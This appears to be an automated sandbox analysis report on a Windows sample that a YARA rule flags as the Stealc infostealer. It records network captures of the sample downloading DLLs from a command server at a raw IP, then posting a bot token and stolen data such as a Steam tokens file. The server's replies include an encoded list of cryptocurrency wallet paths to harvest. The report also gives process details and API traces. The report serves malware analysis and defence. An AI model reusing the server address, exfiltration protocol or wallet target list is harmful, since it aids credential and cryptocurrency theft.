00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Aug 30, 2024 00:48:09.791074038 CEST	95	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 30, 2024 00:48:10.036473036 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:09 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Aug 30, 2024 00:48:10.341175079 CEST	91	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 30, 2024 00:48:10.755790949 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Aug 30, 2024 00:48:12.204278946 CEST	95	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 30, 2024 00:48:12.452307940 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Aug 30, 2024 00:48:12.659667015 CEST	99	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 30, 2024 00:48:12.906414986 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Aug 30, 2024 00:48:13.461723089 CEST	203	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG Host: 185.215.113.100 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Aug 30, 2024 00:48:14.295829058 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:48:14.377152920 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJE Host: 185.215.113.100 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 2d 2d 0d 0a Data Ascii: ------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="message"wallets------AEBKKECBGIIJJKECGIJE--
Aug 30, 2024 00:48:14.625957012 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:14 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Aug 30, 2024 00:48:14.628353119 CEST	467	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAE Host: 185.215.113.100 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="message"files------JJEGIJEGDBFHDGCAFCAE--
Aug 30, 2024 00:48:14.902343035 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:14 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:48:14.917067051 CEST	565	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKF Host: 185.215.113.100 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="file"------AKFIDHDGIEGCAKFIIJKF--
Aug 30, 2024 00:48:16.014456034 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:48:16.014800072 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:48:16.320039988 CEST	474	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHID Host: 185.215.113.100 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="message"ybncbhylepme------GHJKJDAKEHJDGDGDGHID--
Aug 30, 2024 00:48:16.582369089 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:16 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5458 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 31 3c 62 72 3e 3c 62 72 3e 2a 2e 30 3c 62 72 3e 3c 62 72 3e 2a 2e 70 6c 3c 62 72 3e 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 3c 62 72 3e 2a 2e 7a 6d 3c 62 72 3e 3c 62 72 3e 2a 2e 76 65 3c 62 72 3e 3c 62 72 3e 2a 2e 70 6b 3c 62 72 3e 3c 62 72 3e 2a 2e 72 73 3c 62 72 3e 3c 62 72 3e 2a 2e 70 68 3c 62 72 3e 3c 62 72 3e 2a 2e 6d 78 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 3c 62 72 3e 2a 2e 74 68 3c 62 72 3e 3c 62 72 3e 2a 2e 63 6f 3c 62 72 3e 3c 62 72 3e 2a 2e 69 64 3c 62 72 3e 3c 62 72 3e 2a 7a 2e 69 64 3c 62 72 3e 3c 62 72 3e 2a 2e 74 72 3c 62 72 3e 3c 62 72 3e 2a 2e 63 7a 3c 62 72 3e 3c 62 72 3e 2a 2e 69 6f 3c 62 72 3e 3c 62 72 3e 2a 2e 64 7a 3c 62 72 3e 3c 62 72 3e 2a 2e 64 65 3c 62 72 3e 3c 62 72 3e 2a 2e 6b 72 3c 62 72 3e 3c 62 72 3e 2a 2e 6d [TRUNCATED] Data Ascii: .1<br><br>.0<br><br>.pl<br><br>.ar<br><br>.br<br><br>.ec<br><br>.eg<br><br>.in<br><br>.pt<br><br>.ac<br><br>.bd<br><br>.zm<br><br>.ve<br><br>.pk<br><br>.rs<br><br>.ph<br><br>.mx<br><br>.in<br><br>.th<br><br>.co<br><br>.id<br><br>z.id<br><br>.tr<br><br>.cz<br><br>.io<br><br>.dz<br><br>.de<br><br>.kr<br><br>.ma<br><br>.jp<br><br>.za<br><br>.sa<br><br>.vn<br><br>.cl<br><br>.pe<br><br>.ke<br><br>.tw<br><br>.cn<br><br>.my<br><br>.mz<br><br>.sv<br><br>.au<br><br>.bo<br><br>.mn<br><br>.lb<br><br>.es<br><br>.org<br><br>.uk<br><br>.ug<br><br>.sy<br><br>.gh<br><br>.bc<br><br>.ao<br><br>.ni<br><br>.ng<br><br>.to<br><br>.edu<br><br>.it<br><br>.tn<br><br>.net<br><br>.gn<br><br>.hk<br><br>.uy<br><br>.ae<br><br>.np<br><br>.mm<br><br>.do<br><br>.ir<br><br>.biz<br><br>.tv<br><br>.gt<br><br>.ps<br><br>.dk<br><br>.gp<br><br>.hu<br><br>.ge<br><br>.ci<br><br>.ca<br><br>.al<br><br>.jo<br><br>.sn<br><br>.is<br><br>.ro<br><br>.cr<br><
Aug 30, 2024 00:48:16.592736959 CEST	474	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID Host: 185.215.113.100 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 2d 2d 0d 0a Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJJKFBAAAFHJEBFIEGID--
Aug 30, 2024 00:48:17.389978886 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	18:47:55
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x180000
File size:	1'793'024 bytes
MD5 hash:	9EE7D1FB0F1E8A7A998DA096B4DA22A9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00199270 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,013A0588), ref: 001992B1
GetProcAddress.KERNEL32(75900000,013A05A0), ref: 001992CA
GetProcAddress.KERNEL32(75900000,013A05B8), ref: 001992E2
GetProcAddress.KERNEL32(75900000,013A05D0), ref: 001992FA
GetProcAddress.KERNEL32(75900000,013A05E8), ref: 00199313
GetProcAddress.KERNEL32(75900000,013A8B50), ref: 0019932B
GetProcAddress.KERNEL32(75900000,01396360), ref: 00199343
GetProcAddress.KERNEL32(75900000,013964E0), ref: 0019935C
GetProcAddress.KERNEL32(75900000,013A0600), ref: 00199374
GetProcAddress.KERNEL32(75900000,013A0630), ref: 0019938C
GetProcAddress.KERNEL32(75900000,013A0648), ref: 001993A5
GetProcAddress.KERNEL32(75900000,013A0690), ref: 001993BD
GetProcAddress.KERNEL32(75900000,01396640), ref: 001993D5
GetProcAddress.KERNEL32(75900000,013A0660), ref: 001993EE
GetProcAddress.KERNEL32(75900000,013A06A8), ref: 00199406
GetProcAddress.KERNEL32(75900000,01396380), ref: 0019941E
GetProcAddress.KERNEL32(75900000,013A06C0), ref: 00199437
GetProcAddress.KERNEL32(75900000,013A08D0), ref: 0019944F
